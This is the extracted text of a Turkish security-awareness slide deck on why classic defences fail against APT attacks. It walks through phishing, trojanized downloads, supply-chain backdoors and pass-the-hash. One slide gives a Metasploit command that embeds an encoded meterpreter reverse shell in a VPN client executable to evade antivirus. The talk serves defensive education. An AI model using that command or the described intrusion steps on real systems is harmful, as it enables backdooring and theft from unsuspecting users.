APT Saldırıları Karşısında Güvenlik Sistemlerinin Yetersizliği Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Huzeyfe.onal@bga.com.tr Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR
Huzeyfe ÖNAL Bilgi Güvenliği Danışmanı & Ağ Güvenliği Araş<rmacısı @BGA PenetraAon Tester Eğitmen Bilgi Güvenliği AKADEMİSİ Linux AKADEMİ ÖğreAm Görevlisi Bilgi / Bahçeşehir Üniversitesi Blogger - www.lifeoverip.net
Amaç Günümüz güvenlik problemlerinin temelini oluşturan son kullanıcı farkındalık eksikliği ve zararlı yazılımlar karşısında Firewall/IPS/AnAvirüs gibi klasik siber güvenlik sistemlerinin yetersizliğinin anlaşılması.
!! Uyarı!! Bu sunumda geçen tüm olaylar ve ekran görüntülerinin gerçek kişilerle ilgisi yoktur, sanal dünyadan alınmış[r. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR
10 Sene Önce Siber Dünya Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR
Geleneksel Güvenlik Yaklaşımı Network, işleam sistemi ve servis güvenliği Router(ACL), Firewall Intrusion DetecAon System Intrusion PrevenAon System»... Bütçenin tamamına yakını standart savunma sistemleri için ayrılır. Kullanıcılara yönelik tehdit genellikle es geçilir...onun zaten farkındayız yaklaşımı GerçekleşArilen güvenlik testleri kontrol listesindeki bir maddeyi daha geçebilmek için yap<rılır.
Katmanlı Güvenlik Mimarisi(?) Güvenlik ürünleri listesi Güvenlik duvarı Saldırı Tespit ve Engelleme Sistemi AnAvirüs, AnAspam, AnA NAC, 802.1x çözümü DLP Güvenliğin artması para harcama ile doğru oran<lı değildir Katmanlı güvenlik mimarisini yanlış anlama
Sorularla Güvenliğimiz Kaç kişi/kurum son bir yıl içerisinde APT benzeri sofisake bir saldırıya maruz kaldı Daha da önemlisi kaç kişi/kurum bu saldırıya maruz kaldığını tespit ej ve nasıl/ne zaman? Daha daha da önemlisi kaç kurum bu Ap saldırıyla karşı karşıya kaldığından habersiz? BGA dan örnekleri Kamu / Özel sektör
APT Kavramı A.P.T (Advanced Persistent Threat) 2010 yılında gündemimize girmiş görece olarak yeni bir konu. Yeni arayışlar ve sektöre heyecan katmak amacıyla gelişarilmiş bir konu mu? Çok daha öncesinden varolan fakat yeteri kadar önem verilmeyen, büyük firmaları hedef alındığında gerçek önemi ortaya çıkan bir konu mu? Teknik olarak eski yöntemler, yeni moavasyonlar Güvenlikcilerin 0-3 yenik başladığı bir kavram
APT ile Mücadele APT kolay tanımlanabilir bir konu olmadığı için mücadelesi de zordur, Mücadelede en önemli husus kime karşı neyin mücadelesinin verildiğidir Saldırgan gibi düşünebilmek ve onların yeteneklerini simule etmek hayaa öneme sahipar. Tanımlanabilir tehditleri engellemek kolaydır Hata: Kolay tanımlanabilir olmayan riskleri eski man<kla çözmeye kalkmak AV firmalarının APT ile uğraşması Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR
APT Saldırı Anatomisi Kaynak: RSA güv. konferansı
APT Yaşam Döngüsü Faz Ak^vite Detaylar I. Faz Keşif, hedef belirleme Hedefin ve hedefe ulaşılabilecek yolların tespit edilmesi II. Faz Oltalama e- postasının gönderilmesi Genellikle bu yöntem tercih edilir (kolay, zahmetsiz ve az teknik detay gerekardiğinden) III. Faz Hedefle irabata geçme Hedef sisteme arka kapı yükleme IV. Faz Hak yükseltme, hedef alanını genişletme Hedef sistemde daha yüksek yetkili kullanıcı haklarına geçiş, farklı ağları keşif V. Faz Veri Kaçırma Hedef sistemden ilgili verilerin şifrelenerek dışarı çıkar<lması, yedeklenmesi VI. Faz Erişimi kalıcı kılma İstenildiğinde tekrar bağlanılabilecek bir yapıyı kurup, logların ve diğer delillerin silinmesi.
APT MoAvasyonu ve Akçeli İşler APT saldırılarında en önemli bileşen saldırganın moavasyonudur. Bu moavasyon genellikle maddi karşılık<r. Saldırganın moavasyon durumuna göre APT saldırısı 1 gün de sürebilir 4 yıl da sürebilir. 0 day exploit çıkması için beklenen süre v.s Hacklenen 3. para yazılımın güncellenmesini bekleme
Türkiye den İstaAsAkler
Hatalı APT Yaklaşımları Bize birşey olmaz yaklaşımı Saldırgan bula bula bizi mi bulacakj Sadece ürünle çözmeye çalışmak Sadece ağ trafiği dinleyerek çözmeye çalışmak Farkındalık+APT ürünü+log yöneami+offsec Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR
Örnek APT Senaryo İncelemeleri 1 2
Senaryo- I Sebep:Farkındalık ve son kullanıcı güvenlik önlemlerinin yetersiz olması Hikaye: Saldırgan ipsec VPN kullanan firmaları hedef alarak erişim bilgilerini toplayarak bunları satmak ister. Bunun için bir adet tuzak sistem kurar (kurulu sistemi hackler) ve arama motorları sonuçlarına güvenen son kullanıcıları avlamaya başlar. Günün sonunda başladığı yerden bir mil ötede hiç hesaba katmadığı firmaların iç ağlarına erişip hassas çizimleri başkalarına para karşılığında satar
Senaryo internet üzerinden bir exe dosyasının indirilmesi ile başlar Internet üzerinden exe yasaklanabilir (?) Senaryodaki.exe yerine.pdf,.zip, xls,.doc ve benzeri uzan<lar kullanılabilir veya uzan<ya gerek olmadan yeni çıkmış 0 day açıklardan biri kullanılarak Explorer ve benzeri browserlar üzerinden işlem yap<rılabilir.
Keşif, Bilgi Toplama ve Tuzak Adımı Saldırgan Google kullanarak VPN istemcisi ara<r ve ilk sayfada çıkan linke <klayarak programı indirir Bilgisayarına programı kurar ve VPN bağlan<sını başla<r. Saldırgan program çalış<ğında son kullanıcı bilgisayarına erişim sağlar
İlk Adım Zorlukları Google da ilk sayfada çıkan sistemin hacklenmesi SSL heartbleed açıklığı sonrası durum İlk sayfada çıkan sistem hacklenemiyorsa yeni bir site kurup Black Seo yöntemleri ile ilk sayfaya alınması Hemen her gün yeni güvenlik zafiyetleri yayınlanır
VPN İstemci Programına Arka kapı YerleşArme msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.106 R msfencode - t exe - x template_x86_windows.exe - k - o nt_backdoor.exe - e x86/shikata_ga_nai - c 5
AnA- (Virus/Malware/ ) Atlatma Özelliği Ekleme Klasik güvenlik korumaları Aspirin gibidir. Bilinen basit durumlar için işe yarar. ÜreAlen zararlı yazılımların %80 civarının yaşam süresi 3 saajr. Bunun içinde tek kullanımlık malware oranı %70 dir.
AV ler Tara}ndan Tanınmaz Zararlı Oluşturma Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR
Örnek Uygulama Çık<sı
Bekleme Süresi APT saldırılarında en önemli hususlardan biri saldırganın acelesinin olmamasıdır. Saldırgan ağını hazırlar, kurar ve uzun bir süre bekler. Örnek senaryoda 6 ay civarında bir bekleme süresi olduğu tespit edilmişar.
Hassas Bilgilerin Elde Edilmesi
FTP Erişimi ve FTP deki Dosyalara Arka Kapı YerleşArme Saldırgan elde ejği erişim bilgilerini kullanarak FTP sunucuya bağlanır ve FTP sunucuda en son güncellenen dosyaları inceleyerek orjinallerini arka kapılı sürümleriyle değişarir. 3 gün sonra ip adresi X.y.z.t li bir istemcinin merkezi komuta sistemine bağlandığını görür. Hızlıca ilgili kullanıcının bilgisayarına erişim sağlar Bilgisayar firmanın help desk birimi çalışanına aijr ve en yetkili kullanıcı hesabı bilgisayara login olmuştur. Bellek dökümü yaparak parolanın açık hali elde edilir
Sunucu Taraflı bir APT Saldırgan çok bilinen bir blog/cms sisteminin Türkiye sitesini hackler Parola tahmini Bir sonraki sürüm için zaman sayar ve yeni sürüm çık<ğında siteye eklenen yeni Türkçe sürüm dosyaları içine bir adet arka kapı barındıran php dosyası ekler, hash değerlerini değişarir. Bir ha a sonra ilgili dosyanın download sayısı 173.000 olmuştur. Saldırgan tek bir harekea ile 173.000 sisteme arka kapı bırakır.
Apt devam Sunucu loglarından ilgili dosyaları indiren ip adresleri tespit edilip hangilerinde blog yazılımı kurulu belirlenir ve arka kapıların hangi sistemlerde olduğu tespit edilir. Arka kapı üzerinden sunucu ele geçirilir Windows uzerinde Apache Admin hakları ile çalışmaktadır DMZ bölgesindeki diger sunuculara PassThe Hash yöntemi ile erişim sağlanır ve veritabanı sunucusundan yerel ağa erişilir
Türkiye den Örnek APT TesA ve Sonucu Firma ile anlaşma yapılır Gizlilik sözleşmesinde geçen firma ismi hariç hiç bilgi alınmamış<r. Sosyal ağ sitelerinden araş<rma yapılarak hedef 50 kişi belirlenir. (LinkedIN) Firmanın twi er/facebook sayfaları takip edilerek kampanya/duyuru zamanı beklenir. Kampanya ile ilgili siteye benzer alan adı alınarak SPF kayıtları, MX kayıtları girilir ve sahte e- posta hazırlanır. 50 çalışana e- posta gönderilir ve beklemeye alınır.
Ilk 10 dakika içinde 7 kullanıcı sisteme erişmeye çalışır. Hızlıca kullanıcıların hesap bilgileri kullanılarak webmail sistemine erişim sağlanır Tüm kullanıcı bilgisi alınır (bağlı olunan birim ve tel numaraları dahil) Anahtar kelime araması gerçekleşarilir (*.pcf) Bir adet vpn config ve user/pass elde edilir Vpn kurulumu icin gece 03:00 beklenir VPN kurulur yerel ağa bağlan< sağlanır, RDP üzerinden parolası alınan bilgisayara bağlanılır. AV durduruldu, kalıcı arka kapı yüklendi, yerel ağ portları tarandı DB bulundu, erişim sağlandı
Kuruma Ödev Testleri tamamladıktan sonra saldırı tespit ve engelleme sistemini uyaracak çeşitli sahte ataklar düzenlendi. Kuruma bir ha a içerisinde gerçekleşarilen siber saldırı simulasyonu sonucunda eldeki bulguları soruldu IPS logları haric elle tutulur hicbir bilgi gelmedi. Kısacası kurum yap<ğı milyon dolarlık ya<rımın gerçek bir APT saldırısı karşısında kendisini savunamayacağını gördü
Sonuç Siber dünyada güvenliğimiz sadece bize ve sınırlarımıza bağlı değildir. Özellikle hizmet alınan 3. para firmalar ve bunların erişimleri/yetkileri büyük problemdir. Internet üzerinden elde edilen veya yerel ağda dolaşımda olan her tür çalış<rılabilir dosya kontrolden geçmeli. APT teknik bir problemden öte iş dünyasını ilgilendiren hassas bir konudur.
İleAşim Bilgileri Blog www.lifeoverip.net Blog.bga.com.tr Twi er @bgasecurity @huzeyfeonal İleAşim huzeyfe@lifeoverip.net Huzeyfe.onal@bga.com.tr